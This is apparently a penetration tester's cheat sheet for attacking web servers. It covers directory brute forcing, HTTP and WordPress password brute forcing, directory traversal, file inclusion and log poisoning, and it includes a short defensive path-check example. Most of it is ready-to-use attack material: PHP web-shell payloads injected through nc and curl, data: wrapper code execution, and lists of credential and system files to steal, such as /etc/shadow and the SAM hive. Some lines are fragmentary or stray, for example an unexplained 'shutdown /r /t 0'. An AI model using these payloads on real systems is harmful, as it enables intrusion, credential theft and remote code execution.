Web Server Enumeration

PORT 443

…web server ports are not limited to these; look for every open HTTP service, on any port, and enumerate each one
…each web service you find opens up multiple attack vectors (directory brute force, traversal, file inclusion, injection, CMS-specific checks)

dirb <url>
dirb <url>:<port> -o file.txt   # USED TO SCAN OTHER PORTS (the port goes in the URL; dirb's -P is proxy credentials, not a port)
dirbuster                        # GUI USED TO ENUMERATE
gobuster dir -u <url> -w wordlist.txt

# TAKES A WHILE (220K words)
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# QUICKER (87K words)
/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
# QUICKEST (5K words)
/usr/share/wordlists/dirb/common.txt

# Brute force HTTP basic auth on a protected directory
medusa -h <ip> -u admin -P rockyou.txt -M http -m DIR:/admin

DIRECTORY TRAVERSAL
REMOTE FILE INCLUSION
LOCAL FILE INCLUSION
SQL INJECTION

# WordPress Enumeration if found
wpscan --url <url> --passwords /usr/share/wordlists/rockyou.txt --usernames admin
[!] Valid Combinations Found:
 | Username: admin, Password: password
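The note above says web servers are not limited to 80/443. As an added example (not from the original notes), here is a small Python parser that pulls every open HTTP or HTTPS service out of `nmap -oG` (greppable) output, whatever the port, and turns each one into a gobuster command line using the quick wordlist from the list above. The scan output embedded below is constructed for the illustration; the host, ports and version strings in it are not real targets, and the regex assumes the usual greppable layout of `port/state/proto//service//version/`.

```python
import re
from typing import List

# Constructed sample of `nmap -sV -oG` output (not real scan data): one host with
# web services on the default ports and on two non-standard ones. Note that
# nmap writes ssl-wrapped services as "ssl|http" in greppable output.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated as: nmap -sV -oG scan.gnmap 10.10.10.10
Host: 10.10.10.10 ()\tStatus: Up
Host: 10.10.10.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2/, 80/open/tcp//http//Apache httpd 2.4.41/, 443/open/tcp//ssl|http//Apache httpd 2.4.41/, 3000/open/tcp//http//Node.js Express/, 8080/closed/tcp//http-proxy///, 8443/open/tcp//ssl|https-alt///\tIgnored State: filtered (995)
# Nmap done
"""

# port / state / protocol / (empty owner) / service / (empty rpc) ...
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//")


def web_targets(gnmap: str) -> List[str]:
    """Return base URLs for every open TCP port whose service name mentions http."""
    targets = []
    for line in gnmap.splitlines():
        if "Ports:" not in line:
            continue
        host = line.split()[1]
        # Everything after "Ports:" up to the tab that starts "Ignored State:"
        ports_field = line.split("Ports:", 1)[1].split("\t")[0]
        for port, state, proto, service in PORT_RE.findall(ports_field):
            if state != "open" or proto != "tcp" or "http" not in service:
                continue
            scheme = "https" if ("ssl" in service or "https" in service) else "http"
            targets.append(f"{scheme}://{host}:{port}")
    return targets


def gobuster_commands(gnmap: str,
                      wordlist: str = "/usr/share/wordlists/dirb/common.txt") -> List[str]:
    """One gobuster invocation per discovered web service."""
    return [f"gobuster dir -u {t} -w {wordlist}" for t in web_targets(gnmap)]


if __name__ == "__main__":
    for cmd in gobuster_commands(SAMPLE_GNMAP):
        print(cmd)
```

Ports 22 (not http) and 8080 (closed) are skipped; 3000 and 8443 are picked up even though nobody would list them under "PORT 80/443", which is exactly the point of the note.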


…you may be able to view files on the server
…you'll traverse file paths using "../../../" to go backward (up) out of the web root
…then append the path of the file you are trying to read


…you can look for very common files on a system

WINDOWS
C:\windows\win.ini
C:\windows\system.ini
C:\windows\iis.log
C:\windows\System32\Drivers\etc\hosts
C:\Windows\system32\config\SYSTEM
C:\windows\debug\netsetup.log
C:\windows\debug\sammui.log
C:\windows\debug\netlogon.log
C:\windows\debug\passwd.log
C:\windows\system32\winevt\logs\system.evtx
C:\windows\system32\winevt\logs\Windows Powershell.evtx
C:\windows\WindowsUpdate.log
C:\windows\system32\calc.exe
C:\windows\system32\windowspowershell\v1.0\powershell.exe
C:\windows\ccm\logs\filesystemfile.log
C:\users\administrator\appdata\local\recently-used.xbel
C:\users\administrator\desktop\desktop.ini
C:\windows\panther\unattended.xml
C:\windows\panther\unattended\unattended.xml
C:\windows\repair\sam
C:\windows\system32\tasks\daily
C:\windows\panther\sysprep.inf

LINUX
/etc/passwd
/etc/shadow
/etc/crontab
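To make the traversal mechanics concrete, the following is an added Python example (not from the original notes) that reproduces what a `?file=` handler does when it glues the parameter onto its web root, alongside the check that stops it. It works on path strings only, so it runs offline for both the Linux and the Windows targets listed above; the web roots `/var/www/html` and `C:\inetpub\wwwroot` are assumed for the illustration. It also covers two cases the notes mention elsewhere: percent-encoded `../` and the `%00` padding.

```python
import ntpath
import posixpath
from typing import Optional
from urllib.parse import unquote


def _mod(windows: bool):
    # Pure-string path modules, so the Windows case runs on any host
    return ntpath if windows else posixpath


def vulnerable_resolve(root: str, requested: str, windows: bool = False) -> str:
    """What a naive ?file= handler opens: the decoded parameter joined onto
    the web root. '../' segments walk above the root, and an absolute path
    makes join() drop the root entirely."""
    p = _mod(windows)
    return p.normpath(p.join(root, unquote(requested)))


def safe_resolve(root: str, requested: str, windows: bool = False) -> Optional[str]:
    """Decode, reject NUL padding, normalise, then insist the result is still
    inside root. Returns None for anything that would escape.

    commonpath() is used instead of startswith() so that /var/www/html2
    is not mistaken for a child of /var/www/html."""
    p = _mod(windows)
    decoded = unquote(requested)
    if "\x00" in decoded:          # %00 truncation trick (old PHP)
        return None
    root = p.normpath(root)
    candidate = p.normpath(p.join(root, decoded))
    try:
        if p.commonpath([root, candidate]) != root:
            return None
    except ValueError:             # different drive / UNC path on Windows
        return None
    return candidate


if __name__ == "__main__":
    root = "/var/www/html"
    for req in ("images/logo.png", "../../../../etc/passwd", "/etc/shadow",
                "%2e%2e/%2e%2e/%2e%2e/etc/passwd%00"):
        print(f"{req!r:45} naive -> {vulnerable_resolve(root, req)!r:25} "
              f"safe -> {safe_resolve(root, req)!r}")
    win = "C:\\inetpub\\wwwroot"
    print(vulnerable_resolve(win, "..%5c..%5cwindows%5cwin.ini", windows=True))
    print(safe_resolve(win, "..%5c..%5cwindows%5cwin.ini", windows=True))
```

Note that `safe_resolve` only reasons about the path string; on a real server a symlink inside the web root can still point outside it, so the check belongs on the `realpath` of the final file as well.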


… you may be able to reference a file on your own server via the web request
… look for a page or file request (?page=)
… URL encoding may be done through BurpSuite Decoder

# EXAMPLE USING ACS WITH ESCAPE PADDING AT THE END
# EXAMPLE USING CURL (set CMD in your shell first; the PHP is sent as the POST body)
curl -s --data "<?system('$CMD');?>" '<url>'


… if you can poison a file on their server, you may be able to use it
… sometimes this works after discovering Directory Traversal
… URL encoding may be done through BurpSuite Decoder

# DIRECTORY TRAVERSAL WORKED
?file=../../../../../../../var/log/httpd/access_log
# SO LFI MAY WORK BY POISONING THE LOG FILES

# data: WRAPPER (no log needed, but requires allow_url_include=On)
?file=data:text/plain,<?php echo shell_exec("dir") ?>
# OTHER PARAMETERS TO TRY
?helpfile=../secret/.htpasswd
?download=brochure.pdf
?download=../include/connection.php
# URL ENCODE THROUGH BURPSUITE DECODER
?file=data:text/plain,%3C?php%20echo%20shell_exec(%22id%22)%20?%3E

# MORE LOG POISONING TECHNIQUES
# COMMON PADDING (null byte truncation; only works on PHP < 5.3.4)
param=../../../../../../etc/passwd%00

# Default Locations
RHEL / Red Hat / CentOS / Fedora Linux Apache log file location
/var/log/httpd/access_log
/var/log/httpd/error_log
Debian / Ubuntu Linux Apache log file location
/var/log/apache2/access.log
/var/log/apache2/error.log
FreeBSD Apache log file location
/var/log/httpd-access.log
/var/log/httpd-error.log
# For custom log locations, find the "CustomLog" and "ErrorLog" definitions within these files:
/usr/local/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
/etc/httpd/conf/httpd.conf
# Windows web roots
C:/xampp/htdocs/
C:/wamp/www/
C:/Inetpub/wwwroot/

# CONNECT AND POISON (the PHP goes into the User-Agent / request line so Apache writes it into access_log)
$ nc <ip> 80
<?php echo shell_exec($_GET['cmd']);?>
# USE LANG ATTRIBUTE TO ACCESS LOG
# UPLOAD NETCAT WITH TFTP
# EXECUTE NETCAT


shutdown /r /t 0
